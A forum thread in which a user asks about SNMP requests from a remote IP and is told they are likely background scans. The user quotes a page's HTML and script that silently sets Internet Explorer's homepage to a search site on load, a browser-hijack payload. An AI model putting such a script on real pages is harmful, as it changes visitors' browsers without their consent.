SNMP.exe

[Spike]

Could someone please tell me what they Simple Network Management Protocol is all about, how it can be used, and in particular, why a remote machine carrying the IP 65.70.150.187 would be originating a request to my machine?

I'll happily admit that I don't know anything about this protocol, but I've rarely seen it and I've just visited an interesting page at new.net that looked like it was scripted to attempt to change my homepage and serve me advertisements. Clearly, I'm wondering if the two might be related.

 

[Nodsu]

It's a protocol that allows you to ask data from a device and also send data to a device. In plain, you can control things with it.

It is normally used to monitor and control networking gear like routers and switches.
Of course it can be used to transmit any data and perform any actions if the server supports it (by design or not).

You were most likely hit by a generic scan over a range of IP addresses looking for open SNMP ports and potentially vulnerable servers behind it.

If the access was blocked then don't sweat about it. You should be looking at traffic that actually gets through, not the normal internet background radiation.

 

[Spike]

Many thanks for than Nodsu! Very helpful.

I do tend to look at the traffic that gets through, but as this was the first time my firewall had encountered a rewuest for the service, It struck me as strange, and so I blocked the traffic.

What I did wonder, was that perhaps it was possible that my computer had picked up something from a new.net site that offered me a page called shp.php containing

<HTML XMLNS:IE>
<HEAD>
<STYLE>
@media all { IE\:HOMEPAGE { behavior:url(#default#homepage)}}
</STYLE>

<SCRIPT>
var HP="http://search.qsrch.com/";
function setHP(){
if(!oHomePage.isHomePage(HP)){ oHomePage.setHomePage(HP); }
window.close('SHP');
}
</SCRIPT>
</HEAD>
<BODY onload="setHP()">
<IE:HOMEPAGE ID="oHomePage" />
</BODY>
</HTML>

amongst a variety of other ads and pages.

I thought that perhaps the SNMP request may have been initiated by something my machine may have downloaded when it decided to visit these pages. I don't get this sort of thing often these days.

The only reaso these things particularly bother me is that I've found that quite often, the damage from hijacks or spyware isn't too great a problem until you reboot the machine, and so catching it quickly can save a lot of hassle. I may be wrong about this, but it's what my experience so far seems to indicate.

Many thanks.

 

[RealBlackStuff]

Obviously some rotter who wants to change your home-page. Put him and its IP on the blacklist if you can, in Windows put them in your HOSTS file.